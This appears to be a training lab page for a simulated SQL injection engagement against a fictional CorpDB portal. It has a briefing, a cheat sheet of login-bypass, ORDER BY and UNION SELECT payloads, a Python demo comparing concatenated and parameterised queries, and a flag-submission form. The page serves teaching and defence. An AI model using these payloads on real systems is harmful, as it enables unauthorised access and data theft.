CYBERSEC LAB

VIRTUAL PENETRATION TESTING ENVIRONMENT
MODULE 5 — SQL INJECTION & DATA EXFILTRATION

🎯 ASSIGNMENT GOALS

Identify the SQLi vulnerability in the login form.
Bypass authentication using a SQL injection payload.
Discover the UNION injection flaw in the search field.
Enumerate columns using ORDER BY.
Extract the flag from secret_vault using UNION SELECT.
Paste the API key into the Incident Report and submit.
📋 BRIEFING
⚠ CLASSIFIED — PENTEST ENGAGEMENT

MISSION BRIEFING

Operation: DB Phantom  |  Clearance: Level 3
SCENARIO
You are a contracted penetration tester hired by CorpDB Inc. to audit their internal web portal.

Intelligence gathered during pre-engagement suggests the login form and internal employee search functionality were developed without proper input sanitization. Your job is to confirm the vulnerability, gain unauthorized access, and exfiltrate sensitive data from the backend database.

The client suspects a table named secret_vault exists in the database and contains classified API keys. Your final objective is to retrieve its contents.
OBJECTIVES
1. Identify that the login form is vulnerable to SQL injection by observing verbose error output.
2. Bypass the login using a classic SQLi authentication bypass payload to gain admin access.
3. Discover that the employee search field inside the admin panel is also injectable.
4. Use ORDER BY to enumerate the number of columns returned by the query.
5. Craft a UNION SELECT payload to dump the secret_vault table and retrieve the flag.
6. Paste the extracted API key into the Incident Report and submit.
TOOLS AVAILABLE
Web Browser: Multi-tab browser — navigate to the target at corpdb.lab
Reference Manual: SQLi cheat sheet with payloads, techniques, and examples
Notepad: Take notes during the engagement
TARGET
CorpDB Portal
http://corpdb.lab  |  IP: 172.16.0.10
WEB BROWSER

CORPDB PORTAL

Internal database management system — Authorized personnel only

SYSTEM NOTICE
Welcome to the CorpDB internal portal. This system is for authorized employees only. Please log in with your credentials to access the employee database and management tools.

STAFF LOGIN

Enter your credentials to access the portal

AUTHENTICATE

Powered by CorpDB v3.2 — MySQL backend

EMPLOYEE SEARCH

Enter a name to search the employee database.
REFERENCE MANUAL — SQL INJECTION
WHAT IS SQL INJECTION?
SQL injection occurs when user input is inserted directly into a SQL query without sanitization. An attacker can manipulate the query logic to bypass authentication, extract data, or destroy records.
PHASE 1 — LOGIN BYPASS PAYLOADS
The login query likely looks like:
SELECT * FROM users WHERE username='INPUT' AND password='INPUT'
Inject into the username field to short-circuit the AND clause:
' OR '1'='1' --
' OR 1=1 --
admin' --
' OR 'x'='x
') OR ('1'='1
The -- comments out the rest of the query. Use any password when the username payload is injected.
PHASE 2 — UNION-BASED EXTRACTION
Once inside, find injectable fields. UNION SELECT lets you append results from other tables. You must first find the number of columns.
STEP 1 — ENUMERATE COLUMNS WITH ORDER BY
' ORDER BY 1 -- ← works
' ORDER BY 2 -- ← works
' ORDER BY 3 -- ← works
' ORDER BY 4 -- ← ERROR → 3 columns!
STEP 2 — UNION SELECT TO DUMP DATA
' UNION SELECT 1,2,3 --
' UNION SELECT table_name,2,3 FROM information_schema.tables --
' UNION SELECT vault_id,api_key,note FROM secret_vault --
TIPS
• The number of columns in your UNION must match the original query
• Use -- or # to comment out trailing SQL
• If results show numbers like 1, 2, 3 — those are your injectable positions
• Target table: secret_vault with columns vault_id, api_key, note
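Added example (not part of the lab's own material): the manual's login bypass and UNION payloads run against a string-concatenated query and against the same query with bound parameters, showing that binding makes the payload plain data. It uses an in-memory SQLite database as a stand-in for the lab's MySQL backend; the function names, the employees table, the search query shape and all row values are assumptions constructed for the example.

```python
import sqlite3

def make_db():
    # Constructed stand-in schema (SQLite in memory, not the lab's MySQL).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE employees (id INTEGER, name TEXT, dept TEXT);
        CREATE TABLE secret_vault (vault_id INTEGER, api_key TEXT, note TEXT);
        INSERT INTO users VALUES ('admin', 'constructed-password');
        INSERT INTO employees VALUES (1, 'Alice Example', 'Finance');
        INSERT INTO secret_vault VALUES (1, 'CONSTRUCTED-KEY', 'sample row');
    """)
    return db

def login_concat(db, username, password):
    # Vulnerable: input becomes SQL text, as in the manual's login query.
    sql = ("SELECT * FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_bound(db, username, password):
    # Hardened: placeholders keep input as data; quotes and -- carry no SQL meaning.
    sql = "SELECT * FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None

def search_concat(db, term):
    # Vulnerable search; the three-column query shape is an assumption.
    sql = "SELECT id, name, dept FROM employees WHERE name LIKE '%" + term + "%'"
    return db.execute(sql).fetchall()

def search_bound(db, term):
    # Hardened search: the whole LIKE pattern is passed as one bound value.
    sql = "SELECT id, name, dept FROM employees WHERE name LIKE ?"
    return db.execute(sql, ("%" + term + "%",)).fetchall()

if __name__ == "__main__":
    db = make_db()
    bypass = "' OR '1'='1' --"  # payload from the manual
    union = "' UNION SELECT vault_id,api_key,note FROM secret_vault --"
    print("login  concat/bound:", login_concat(db, bypass, "x"), login_bound(db, bypass, "x"))
    print("search concat:", search_concat(db, union))
    print("search bound: ", search_bound(db, union))
```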
INCIDENT REPORT — FLAG SUBMISSION
🔐 SQL Injection — Data Exfiltration
Successfully exploit the UNION-based injection to dump the secret_vault table. Copy the api_key value and paste it below.
Target Application
Exfiltrated API Key — paste the api_key value from secret_vault